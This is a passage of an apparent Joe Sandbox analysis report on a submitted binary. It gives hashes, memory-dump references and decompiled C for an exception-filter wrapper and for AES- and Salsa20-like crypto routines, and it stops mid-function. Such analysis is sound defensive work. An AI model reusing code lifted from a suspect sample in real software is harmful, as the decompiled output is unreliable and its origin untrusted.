Opcode ID: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction ID: 4201596fe771204303fc80694ffa3c51b65a798dd9aa63856d52ff29377aa1ed
Opcode Fuzzy Hash: 226e58c457aad325719b948ae6d91a641da7dcd0d883941e63e1cbc8cb95818f
Instruction Fuzzy Hash: 7ED0173200020CFF8F01AFE1EC45C6A7B69FF0C314B180409FA1C45120DA36A820EB25

Uniqueness

Uniqueness Score: -1.00%

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004329BB(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x004329c8

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88

Uniqueness

Uniqueness Score: -1.00%

Function 0040A710 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A710(void* __ecx) {
				signed int _v5;
				unsigned int _v6;
				signed int _v7;
				unsigned int _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v13;
				signed int _v14;
				signed int _t256;
				signed int _t342;
				signed int _t345;
				signed char _t371;
				unsigned char _t372;
				unsigned char _t376;
				signed int _t391;
				unsigned char _t400;
				unsigned char _t409;
				signed char _t519;
				void* _t599;
				signed char* _t600;

				_t600 = __ecx + 2;
				_t599 = 4;
				do {
					_t391 =  *(_t600 - 2);
					_v7 = 0x1b;
					_v12 = _t391;
					_t372 =  *(_t600 - 1);
					_v14 = 0x1b;
					_v6 = _t391 + _t391 ^ 0x0000001b;
					_v10 = _t372;
					_v9 =  *_t600;
					_t400 = _t372 + _t372 ^ (_t372 >> 0x00000007) * 0x0000001b;
					_v5 = _t400;
					_t256 = (_t400 >> 7) * 0x1b >> 0x20 >> 7;
					_t376 = _t256 * 0x1b;
					_v11 = (_t256 * 0x0000001b >> 0x00000020) + (_t256 * 0x0000001b >> 0x00000020) ^ _t376;
					_t409 = _v7 + _v7 ^ 0x0000001b;
					_v13 = 0x1b;
					_v8 = _t409;
					 *(_t600 - 2) = ((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) + (0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ 0x0000001b ^ _t409 + _t409 ^ (_t409 >> 0x00000007) * (_t409 >> 0x00000007) >> 0x00000020 ^ _v11 ^ _t376 ^ _v6 ^ _v10 ^ _v12) ^ ((0x0000001b ^ _t409 + _t409) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _t409 + _t409) >> 0x00000007) * ((0x0000001b ^ _t409 + _t409) >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (_v11 >> 0x00000007) * 0x0000001b ^ (_t376 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b ^ (_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 ^ _v14 ^ _v7 ^ _v9 ^ _v10;
					 *(_t600 - 1) = ((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b ^ 0x0000001b ^ (((0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) + (0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ 0x0000001b ^ _v8 + _v8 ^ _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5 ^ _v5 ^ _v9 ^ _v10) ^ 0x0000001b ^ (_v8 >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ ((_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v5 >> 0x00000007) * 0x0000001b ^ _v5 + _v5) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b) * 0x0000001b >> 0x00000020 ^ _v7 ^ _v9 ^ _v12;
					_t342 = _v6 >> 7;
					_t345 = _t342 * 0x1b >> 0x20 >> 7;
					 *_t600 = ((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007 ^ (((0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) + (0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ 0x0000001b ^ _v8 + _v8 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 ^ (_v8 >> 0x00000007) * (_v8 >> 0x00000007) >> 0x00000020 >> 0x00000007 ^ ((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) ^ _v6 ^ _v7 ^ _v9) ^ ((0x0000001b ^ _v8 + _v8) >> 0x00000007) * 0x0000001b ^ (((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ _v8 + _v8) >> 0x00000007) * ((0x0000001b ^ _v8 + _v8) >> 0x00000007) >> 0x00000020) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ ((((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b ^ (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020) + (((_v6 >> 0x00000007) * 0x0000001b >> 0x00000020 >> 0x00000007) * 0x0000001b >> 0x00000020)) >> 0x00000007) * 0x0000001b) >> 0x00000007) * 0x0000001b ^ _t342 * 0x0000001b ^ _v13 ^ 0x0000001b ^ _v7 ^ _v10 ^ _v12;
					_t519 = (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) + (0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ 0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 ^ (_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020 >> 0x00000007 ^ (_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020 ^ _v5 ^ _v7 ^ _v12) >> 0x00000007 ^ 0x0000001b ^ (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * 0x0000001b ^ ((((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) * (((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) * ((0x0000001b ^ ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020) + ((_v8 >> 0x00000007) * ((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b >> 0x00000020) >> 0x00000020)) >> 0x00000007) >> 0x00000020) >> 0x00000020) * 0x0000001b ^ (((_t345 * 0x0000001b >> 0x00000007) * 0x0000001b ^ _t345 * 0x0000001b + _t345 * 0x0000001b ^ _t345 * 0x0000001b >> 0x00000020) >> 0x00000007) * 0x0000001b ^ (_v5 >> 0x00000007) * 0x0000001b;
					_t371 = _t519 * 0x1b;
					_t600 =  &(_t600[4]);
					 *(_t600 - 3) = _t519 ^ _t371 ^ _v13 ^ _v14 ^ _v9 ^ _v10 ^ _v12;
					_t599 = _t599 - 1;
				} while (_t599 != 0);
				return _t371;
			}

0x0040a719
0x0040a71c
0x0040a721
0x0040a726
0x0040a729
0x0040a733
0x0040a73a
0x0040a73f
0x0040a744
0x0040a752
0x0040a757
0x0040a76b
0x0040a76f
0x0040a77f
0x0040a78c
0x0040a792
0x0040a7b0
0x0040a7b2
0x0040a7b7
0x0040a82a
0x0040a8d1
0x0040a961
0x0040a971
0x0040a97d
0x0040aa00
0x0040aa04
0x0040aa11
0x0040aa1a
0x0040aa1d
0x0040aa1d
0x0040aa2a

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction ID: e860a63083750337effb18e539a22bba23e2c33b801c9e422b930a4700f084e4
Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
Instruction Fuzzy Hash: 7BA1EA0A8090E4ABEF455A7E80B63FBAFE9CB27354E76719284D85B793C019120FDF50

Uniqueness

Uniqueness Score: -1.00%

Function 0040274E Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDC0 Relevance: .2, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0040BDC0(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _t176;
				signed int _t207;
				signed int _t209;
				signed int _t215;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				void* _t235;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t246;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed int _t270;
				signed int _t271;
				unsigned int _t272;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t281;
				void* _t284;

				_v56 = 0xa;
				_v60 = __ecx;
				asm("movdqu xmm0, [edi]");
				asm("movdqu [ebp-0x78], xmm0");
				asm("movdqu xmm0, [edi+0x10]");
				asm("movdqu [ebp-0x68], xmm0");
				asm("movdqu xmm0, [edi+0x20]");
				asm("movdqu [ebp-0x58], xmm0");
				asm("movdqu xmm0, [edi+0x30]");
				_t275 = _v80;
				_v8 = _v84;
				_v36 = _v88;
				_v24 = _v92;
				_v48 = _v96;
				_v44 = _v100;
				_v32 = _v104;
				_v20 = _v108;
				_v40 = _v112;
				asm("movdqu [ebp-0x48], xmm0");
				_t238 = _v76;
				_t261 = _v64;
				_t270 = _v68;
				_t278 = _v72;
				_v16 = _v116;
				_v12 = _v120;
				_t176 = _v124;
				_v52 = _t238;
				_v28 = _t176;
				do {
					asm("rol eax, 0x7");
					_v20 = _v20 ^ _t176 + _t238;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v20 + _v28;
					asm("rol eax, 0xd");
					_t240 = _v52 ^ _v24 + _v20;
					_v52 = _t240;
					asm("ror eax, 0xe");
					_v28 = _v28 ^ _v24 + _t240;
					asm("rol eax, 0x7");
					_v36 = _v36 ^ _v12 + _v32;
					asm("rol eax, 0x9");
					_t279 = _t278 ^ _v36 + _v32;
					_t241 = _v44;
					asm("rol eax, 0xd");
					_v12 = _v12 ^ _v36 + _t279;
					asm("ror eax, 0xe");
					_v32 = _v32 ^ _v12 + _t279;
					asm("rol eax, 0x7");
					_t271 = _t270 ^ _v8 + _t241;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _v8 + _t271;
					asm("rol eax, 0xd");
					_t242 = _t241 ^ _v16 + _t271;
					_v44 = _t242;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _v16 + _t242;
					asm("rol eax, 0x7");
					_t244 = _v40 ^ _t275 + _t261;
					_v40 = _t244;
					asm("rol eax, 0x9");
					_t246 = _v48 ^ _t244 + _t261;
					_v48 = _t246;
					asm("rol eax, 0xd");
					_t276 = _t275 ^ _v40 + _t246;
					asm("ror eax, 0xe");
					_t262 = _t261 ^ _t246 + _t276;
					asm("rol eax, 0x7");
					_v12 = _v12 ^ _v28 + _v40;
					_t207 = _v12;
					_v120 = _t207;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _t207 + _v28;
					_t209 = _v16;
					_v116 = _t209;
					asm("rol eax, 0xd");
					_t248 = _v40 ^ _t209 + _v12;
					_v40 = _t248;
					asm("ror eax, 0xe");
					_v112 = _t248;
					_t250 = _v28 ^ _v16 + _t248;
					asm("rol eax, 0x7");
					_v44 = _v44 ^ _v32 + _v20;
					_t215 = _v44;
					_v100 = _t215;
					asm("rol eax, 0x9");
					_v28 = _t250;
					_v124 = _t250;
					_t252 = _v48 ^ _t215 + _v32;
					_v48 = _t252;
					asm("rol eax, 0xd");
					_v20 = _v20 ^ _v44 + _t252;
					_t219 = _v20;
					_v108 = _t219;
					asm("ror eax, 0xe");
					_v96 = _t252;
					_t254 = _v32 ^ _t219 + _t252;
					_v32 = _t254;
					_v104 = _t254;
					_t255 = _v36;
					asm("rol eax, 0x7");
					_t275 = _t276 ^ _v8 + _t255;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v8 + _t275;
					_t225 = _v24;
					_v92 = _t225;
					asm("rol eax, 0xd");
					_t256 = _t255 ^ _t225 + _t275;
					_t227 = _t256;
					_v36 = _t256;
					_v88 = _t227;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _t227 + _v24;
					_v84 = _v8;
					asm("rol eax, 0x7");
					_t238 = _v52 ^ _t262 + _t271;
					_v52 = _t238;
					_v76 = _t238;
					asm("rol eax, 0x9");
					_t278 = _t279 ^ _t262 + _t238;
					asm("rol eax, 0xd");
					_t270 = _t271 ^ _t278 + _t238;
					asm("ror eax, 0xe");
					_t261 = _t262 ^ _t270 + _t278;
					_t132 =  &_v56;
					 *_t132 = _v56 - 1;
					_t176 = _v28;
				} while ( *_t132 != 0);
				_v80 = _t275;
				_t235 = _a4 + 2;
				_t277 = _v60;
				_v64 = _t261;
				_v72 = _t278;
				_t280 = 0;
				_v68 = _t270;
				_t259 = _t277 -  &_v124;
				do {
					_t235 = _t235 + 4;
